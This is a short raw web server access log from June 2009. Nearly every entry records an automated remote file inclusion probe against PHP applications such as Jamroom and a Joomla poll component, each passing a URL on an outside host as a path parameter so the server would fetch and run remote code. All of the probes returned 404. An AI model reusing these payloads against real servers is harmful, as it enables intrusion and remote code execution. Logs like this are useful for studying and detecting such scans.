222.162.115.67 - - [22/Jun/2009:06:16:04 -0400] "GET /popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
209.59.12.99 - - [22/Jun/2009:06:16:06 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.61.244.6 - - [22/Jun/2009:06:16:39 -0400] "GET //authentication/errors.php?error=http://r-shooter.com/bbs/data/test.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
209.61.244.6 - - [22/Jun/2009:06:16:40 -0400] "GET /logs//authentication/errors.php?error=http://r-shooter.com/bbs/data/test.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
222.162.115.67 - - [22/Jun/2009:06:17:03 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
222.162.115.67 - - [22/Jun/2009:06:17:10 -0400] "GET /logs/access_log.Q109053000%20%20/popup.php?path=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:17:12 -0400] "GET /logs/access_log.Q109051600%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:17:12 -0400] "GET /logs/access_log.Q109061200%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:18:02 -0400] "GET /logs/access_log.Q109051700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
74.53.70.114 - - [22/Jun/2009:06:18:33 -0400] "GET /logs/access_log.Q109053100%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.fraternidadsinaloense.com/foro/uiu.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
212.88.179.68 - - [22/Jun/2009:06:19:00 -0400] "GET /logs/access_log.Q109052800//include/footer.php?_path[counter]=http://www.egile.lt/images/id.txt?? HTTP/1.1" 404 244 "-" "libwww-perl/5.805"
